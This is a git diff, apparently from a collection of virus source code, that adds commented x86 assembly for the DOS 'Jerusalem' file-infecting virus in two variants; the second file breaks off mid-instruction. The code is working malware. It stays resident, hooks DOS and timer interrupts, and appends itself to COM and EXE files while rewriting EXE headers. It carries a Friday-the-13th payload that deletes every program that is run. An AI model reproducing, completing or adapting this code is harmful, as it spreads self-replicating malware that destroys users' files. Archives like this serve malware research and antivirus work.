RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ; + JMP N08_90 ; + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ; + PUSH CX ; + PUSH SI ; THIS DELAY CODE NEVER GETS EXECUTED + MOV CX,4001H ; IN THIS VERSION + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECTION PROCESS OCCURS HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE (OBVIOUSLY) + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE - YES + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;----------------------------------------------------------------------- + diff --git a/MSDOS/Virus.MSDOS.Unknown.isreali.asm b/MSDOS/Virus.MSDOS.Unknown.isreali.asm new file mode 100644 index 00000000..84c88f9f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.isreali.asm @@ -0,0 +1,882 @@ + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... + JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE + JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? + PUSH CX ; + PUSH SI ; + MOV CX,4001H ; + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECT PROCESS SEEMS TO OCCUR HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F 